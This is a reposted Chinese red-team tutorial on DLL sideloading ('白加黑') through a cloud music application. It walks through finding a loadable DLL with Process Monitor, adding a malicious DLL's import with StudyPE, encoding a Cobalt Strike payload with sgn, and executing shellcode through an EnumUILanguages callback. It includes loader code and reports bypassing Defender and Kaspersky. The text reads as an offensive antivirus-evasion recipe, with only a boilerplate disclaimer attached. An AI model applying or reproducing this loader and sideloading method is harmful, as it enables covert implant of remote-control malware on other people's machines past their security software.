文章总结： 本文详述了利用某云音乐实现白加黑上线的过程。通过ProcessMonitor筛选目标DLL，使用StudyPE修改导入表注入恶意DLL，结合sgn编码器绕过静态查杀，利用EnumUILanguages回调执行Shellcode，成功在Defender和卡巴斯基环境下免杀上线，展示了DLL劫持与免杀技术的具体应用。 综合评分： 80 文章分类： 免杀,红队,渗透测试,二进制安全

【转载】通过某云音乐实现白加黑上线

1107498922678776 1107498922678776

隐雾安全

2026年1月27日 09:01 四川

好文推荐

文章作者：先知社区(1107498922678776)

文章来源：https://xz.aliyun.com/news/16171

通过某云音乐白加黑实现上线

文章声明

本文章中所有内容仅供学习交流，严禁用于商业用途和非法用途，否则由此产生的一切后果均与文章作者无关

用到的工具

• 1.Process Monitor
• 2.StudyPE
• 3.sgn

一、通过Process Monitor找到我们需要的DLL 简单介绍一下Process Monitor是微软提供的一款系统进程监视软件

一打开Process Monitor是有很多进程的我们需要通过名字筛选一下

然后看一下有那些是某音乐目录里的dll,这里找到一个进去看一下

这里发现swresample-3感觉可以尝试

二.通过StudyPE工具把自己的黑dll导入 StudyPE是一款PE32amp;PE64查看/剖析集成化工具，出示了丰富多彩的PE编辑功能

把我们找到的dll文件拖入StudyPE,查看导入表

然后把我们准备的黑dll通过添加导入函数导入进去(提前把dll文件给备个份,以防损坏)

可以看到我们的黑dll函数已经被添加进去了

然后保存,把我们的黑dll也拖入目录启动程序,在核晶状态下成功上线

卡巴斯基免费版也是成功上线

三.黑DLL的编写 这里介绍一下sgn SGN是一个用于进攻性安全目的的多态二进制编码器，其核心是生成静态不可检测的二进制payloads

https://github.com/EgeBalci/sgn cs生成的bin文件我们用sgn编码一下可以很大程度帮助我们过静态,这里的loader主要用到回调函数的方法执行

// 获取解密后的shellcode的地址 char* shllcode = (char*)buf; // 声明一个DWORD变量用于存储旧的内存保护属性 DWORD dwOldPro = 0; // 更改解密后的shellcode所在内存区域的保护属性，允许执行、读、写 BOOL ifExec = VirtualProtect(shllcode, sizeof(buf), PAGE_EXECUTE_READWRITE, &dwOldPro); // 使用EnumUILanguages函数执行解密后的shellcode EnumUILanguages((UILANGUAGE_ENUMPROC)shllcode, 0, 0);

往期内容

通用0day挖掘思路

某大厂勒索病毒处置流程外泄

今年大一，不小心黑进学校的迎新系统怎么办

英雄联盟租号平台getshell

记一次色情APP的渗透过程

课程推荐

隐雾SRC第八期全面升级

零基础就业班-三包模式

只要98，JS逆向带回家！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：隐雾安全 1107498922678776 1107498922678776《【转载】通过某云音乐实现白加黑上线》